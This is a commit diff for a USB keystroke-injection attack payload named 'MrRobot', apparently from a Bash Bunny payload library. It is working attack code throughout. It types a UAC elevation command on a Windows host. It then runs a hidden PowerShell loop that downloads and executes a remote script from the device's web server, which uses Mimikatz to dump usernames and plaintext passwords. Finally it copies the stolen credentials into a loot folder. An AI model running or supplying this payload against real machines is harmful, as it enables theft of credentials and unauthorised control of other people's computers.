Payload: Fixed stability issues and updated "MrRobot" for firmware v1.1 (#207)

2017-04-30 04:09:53 +03:00 · 2017-04-30 04:09:53 +03:00 · 960bd207f9
parent 750d384df7
commit 960bd207f9
1 changed files with 20 additions and 25 deletions
--- a/payloads/library/credentials/MrRobot/payload.txt
+++ b/payloads/library/credentials/MrRobot/payload.txt
@ -1,53 +1,48 @@
 #!/bin/bash
 #
 # Title:         MrRobot Mimikatz Attack
-# Author:        illwill
+# Author:        illwill, El3ct71k
 # Version:       0.2
 #
 # Dumps the usernames & plaintext passwords from Windows boxes using Powershell in memory
 # with Mimikatz then stashes them in /root/udisk/loot/MrRobot
 #
-# Blue...............Running Powershell / Waiting for WebServer to start
+# Purple......................Setup
-# White..............WebServer started and Uploading Results
+# Yellow single blink.........Running Powershell / Waiting for WebServer to start
-# Purple.............Checking for Results
+# Yellow double blink.........Waiting for server connection and uploading results
 # Cyan inverted single blink..Starts ethenet attack
 # Cyan inverted double blink..Starts server to gets results
 # Green..............Got Creds and copied to loot folder
 # Amber(Blinking)....Mimikatz Error (Not Admin?)
 # Red................No Creds
-
+LED SETUP
 source bunny_helpers.sh
 LED R G 200
 # Creating Loot Folders
 LOOTDIR=/root/udisk/loot/MrRobot
 mkdir -p $LOOTDIR
 SWITCHDIR=/root/udisk/payloads/$SWITCH_POSITION
 mkdir -p $SWITCHDIR/loot
 LED B 200
 # HID Attack Starts
 ATTACKMODE HID
-
+DUCKY_LANG us
 # UAC Bypass
-Q GUI r
+LED STAGE1
-Q STRING powershell -c "Start-Process cmd -verb runas"
+RUN WIN powershell -c "Start-Process cmd -verb runas"
 Q DELAY 250
 Q ENTER
-Q DELAY 1000
+Q DELAY 1500
 Q LEFTARROW
 Q DELAY 500
 Q ENTER
 Q DELAY 1500
 LED STAGE2 
 #Powershell Payload: first wait for connection to bunny webserver, then pull scripts and upload results
 Q STRING "powershell -W Hidden \"while (\$true) {If (Test-Connection 172.16.64.1 -count 1) {IEX (New-Object Net.WebClient).DownloadString('http://172.16.64.1/p.ps1');exit}}\""
 Q DELAY 300
 Q ENTER
 # Ethernet Attack Starts
 ATTACKMODE RNDIS_ETHERNET
-source bunny_helpers.sh
+LED SPECIAL1
 LED R G B 200
 # mount -o sync /dev/nandf /root/udisk
 iptables -A OUTPUT -p udp --dport 53 -j DROP
@ -55,22 +50,22 @@ python $SWITCHDIR/server.py
 #Wait for EOF in loot folder
-LED R B 200
+LED SPECIAL2
 while [ ! -e  "$SWITCHDIR/loot/EOF" ]; do sleep 1; done;
 sleep 1
-# check for empty loot directory, then check results and move them to loot
+# check for empty lootddd directory, then check results and move them to loot
 if [ "$(ls -A $SWITCHDIR/loot/)" ]; then
    if grep -q "ERROR kuhl_m_sekurlsa_acquireLSA" $SWITCHDIR/loot/*.txt; then
-       LED G R 200
+       LED FAIL
       mv -v $SWITCHDIR/loot/*.txt $LOOTDIR
       rm -rf $SWITCHDIR/loot/
    else
       mv -v $SWITCHDIR/loot/*.txt $LOOTDIR
       rm -rf $SWITCHDIR/loot/
-       LED G
+       LED FINISH
    fi
 else
     rm -rf $SWITCHDIR/loot/
-     LED R
+     LED FAIL
 fi